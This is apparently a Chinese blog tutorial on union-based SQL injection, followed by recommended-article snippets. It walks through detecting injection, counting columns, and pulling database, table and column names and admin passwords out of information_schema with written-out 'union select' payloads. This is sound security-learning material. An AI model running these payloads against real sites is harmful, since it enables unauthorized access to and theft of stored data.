SQL注入之联合查询

最新推荐文章于 2024-07-24 17:08:13 发布
最新推荐文章于 2024-07-24 17:08:13 发布
阅读量443 收藏
点赞数 1
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51909453/article/details/122115165
版权

SQL注入之联合查询

SQL注入简介
SQL注入是网站存在最多也是比较简单的漏洞,主要原因是程序对用户输入的字符串没有进行过滤或处理不严谨,导致用户可以通过精心构造语句来非法获取数据库中的信息,SQL注入的首次公开讨论始于1998年左右,至今已有20多年的历史,被冠以漏洞之王的称号。

sql注入原理
sql语言即是结构化查询语言,通俗来讲就是操作数据库的语言,这些语句可以对数据库进行增、删、改、查等操作。
注入在这里即是将用户输入的数据拼接到原始代码中,从而使得被注入的数据被当做代码执行

sql注入的核心:将用户的输入拼接到代码中,并被当做sql语句执行

注入的基本流程

1、判断是否存在注入
核心:输入是否被当作代码执行
常用 and 1=1 ,and 1=2 判断
URL注释符号:%23 ,-- qwe.–+qwe

2、判断字段数
order by(排序,用来判断字段数)
例:order by 1(正常),order by 2(正常),order by 3(报错)
说明有两个字段数

3、判断显错位
因为联合查询前面的字段数要和后面的sql语句的字段数一致,这也是我们要先判断字段数的原因。联合查询时需要让前面查询语句查询不出结果,从而显示后面联合查询的结果来判断先错位。
select union

4、判断库名
database()
把database()放到显错位

5、判断表名
table_name from information_schema.tables where table_schema='库名'
table_name 放到显错位

6、判断列名
column_name from information_schema.columns where table_schema='库名' and table_name='表名'

7、寻找具体数据
例:union select 1,列名 from 表明
列名放在显错位

information_schema(mysql数据库5.0及以上版本,自带数据库,他记录了mysql数据库下所有的数据库名,表名,列名信息)
information_schema.tables(记录表名信息的表)
information_schema.columns(记录列名信息的表)
table_name (表名)
column_name (列名)
table_schema (数据库名)
limit 0,1(限制输出,0表示下标,1表示数量)

具体例子语句
在判断的url后加
判断是否存在注入:and 1=2
判断字段数:order by 2
查询数据库:and 1=2 union select 1,database()
查询表名:and 1=2 union select 1,table_name from information_schema.tables where table_schema =‘maoshe’
查询列名:and 1=2 union select 1,column_name from information_schema.columns where table_name =‘admin’ limit 2,1
查询具体数据:and 1=2 union select 1,password from admin

SonderChan
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入联合查询,最详细的CMS联合查询过程!!!!
08-22
本案例聚焦于CMS(内容管理系统)中的SQL注入,特别是联合查询的利用方法。 【联合查询】是SQL注入的一种技术,允许攻击者合并两个或更多的SELECT语句,以便在不直接访问数据库的情况下获取信息。在这个场景中,...
sql注入联合查询
笔墨稠思
07-07 1028
本次注入采用DVWA作为靶场,数据库采取mysql 首先我们设置一下dvwa的安全等级 修改等级后点击submit按钮,之后我们进入sql注入的实战靶场 联合查询注入,我们需要用到 union 来连接两条sql语句 一.判断注入类型 他给了我们一个form表单,让我们提交一个user ID进去,这个注入点很明确,肯定是我们输入进去的id了,id一般都是int 类型的,但也有可能是字符串类型的 那数据库的查询语句可能是 select * from 表 where id = $user_id 也可能是
sql注入联合查询注入
qq_50953689的博客
05-04 1520
判断数据显示点 (id一定要改为0或负数) id=0' union select 1,2,3 主要作用:测试数据库表中的有效column是哪几列
SQL注入联合查询注入
qq_45691294的博客
07-11 7375
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
SQL注入联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 470
SQL注入联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
SQL注入联合查询(MySQL)
Locksk的博客
11-23 996
SQL注入联合查询0x00 前期准备0x01 联合查询前提0x02 注入步骤0x03个人小结一、Mysql注释二、Mysql系统函数三、其他 0x00 前期准备 环境搭配:Apache24 + php5.6.38 + Mysql5.7.24 本地练习平台:sqli-labs(https://github.com/Audi-1/sqli-labs) 本次靶场:sqli-labs/Less1靶场 配...
二、SQL注入联合查询
qq_55202378的博客
08-21 735
联合注入
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入联合查询、报错注入和sqlmap
Loners_fan的博客
01-03 4089
SQL注入
SQL注入联合查询和报错注入
qq_45076423的博客
11-11 850
联合查询 联合查询就是利用SQL 语句union select 。 union select 会把两条SQL 语句的查询结果拼接起来,形成一张虚拟的表。联合查询会实现跨库跨表查询,会极大减少SQL 注入的成本。 联合查询有两个限制条件 两条SQL 语句的查询结果具有相同的列数 两条SQL 语句相同位置的列具有相同的数据类型 联合查询通常用在数据库的内容会回显到网页上的情况,所以联合查询通...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入靶场.zip
06-24
它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠查询注入等。每个挑战都设计有特定的注入点,需要利用这些点来获取敏感信息,例如数据库中的用户名、密码或其他...
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 794
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 382
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 256
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
最新发布
core815的专栏
07-24 341
SQLynx数据库管理工具
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值